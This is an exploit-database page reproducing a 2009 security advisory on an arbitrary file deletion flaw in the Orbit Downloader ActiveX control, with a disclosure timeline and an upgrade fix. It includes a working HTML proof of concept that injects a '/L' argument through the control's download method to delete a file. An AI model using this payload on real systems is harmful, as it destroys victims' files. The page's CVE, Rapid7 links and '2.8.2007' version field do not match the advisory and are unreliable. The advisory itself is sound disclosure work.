header-logo
Suggest Exploit
vendor:
Orbit Downloader
by:
Janek Vind "waraxe"
8.5
CVSS
HIGH
Arbitrary File Deletion
264
CWE
Product Name: Orbit Downloader
Affected Version From: 2.8.2007
Affected Version To: 2.8.2007
Patch Exists: Yes
Related CWE: CVE-2009-0945
CPE: a:orbitdownloader:orbit_downloader
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1130/https://www.rapid7.com/db/vulnerabilities/apple-osx-webkit-cve-2009-0945/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2009-0945/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-0945/https://www.rapid7.com/db/vulnerabilities/apple-safari-cve-2009-0945/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Pro SP3/IE 6 SP1, Windows Vista Ultimate 64-bit SP1/IE 7
2009

[waraxe-2009-SA#073] – Arbitrary File Deletion in Orbit Downloader <= 2.8.7

In both cases IE security settings were default for Internet Zone. Exploitation tests ended successfully without any warnings or other interaction from Internet Explorer. For testing first create "test.txt" file to the C: root dir and then use IE and hit test button. "test.txt" should be deleted for now :)

Mitigation:

Upgrade to version 2.8.8 or later.
Source

Exploit-DB raw data:

[waraxe-2009-SA#073] - Arbitrary File Deletion in Orbit Downloader <= 2.8.7
===============================================================================

Author: Janek Vind "waraxe"
Date: 21. March 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-73.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Orbit Downloader, leader of download manager revolution, is devoted to new
generation web (web2.0) downloading, such as video/music/streaming media from
Myspace, YouTube, Imeem, Pandora, Rapidshare, support RTMP. And to make general
downloading easier and faster.

http://www.orbitdownloader.com/


List of found vulnerabilities
===============================================================================

1. Arbitrary File Deletion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CLSID: {3F1D494B-0CEF-4468-96C9-386E2E4DEC90}
ProgID: Orbitmxt.Orbit
Executable: orbitmxt.dll
File Version: 2.1.0.2

Tested on following platforms:

1. Windows XP Pro SP3/IE 6 SP1
2. Windows Vista Ultimate 64-bit SP1/IE 7

In both cases IE security settings were default for Internet Zone.
Exploitation tests ended successfully without any warnings or other interaction
from Internet Explorer.

Proof Of Concept:

<html><head>
<title>Orbit Downloader &lt;= 2.8.7 Arbitrary File Deletion PoC by waraxe</title>
<script>
function test()
{
	waraxe.download('','','" /Lc:\\test.txt "','',1);
}
</script>
</head><body>
<object
id="waraxe" name="waraxe"
classid="CLSID:3F1D494B-0CEF-4468-96C9-386E2E4DEC90"
width="50" height="50">
</object>
<br><center>
<button onclick="javascript:test();">  Test  </button>
</body></html>

For testing first create "test.txt" file to the C: root dir and
then use IE and hit test button. "test.txt" should be deleted for now  :) 


Disclosure Timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

03/04/09 Developer contacted
03/04/09 Developer's initial response
03/04/09 Findings sent to developer
03/18/09 New version 2.8.7 released, no fix for specific issue!
03/21/09 Public disclosure


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who know me!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
---------------------------------- [ EOF ] ------------------------------------

# milw0rm.com [2009-03-23]

Navigation

Suggest Exploit

Services By CQR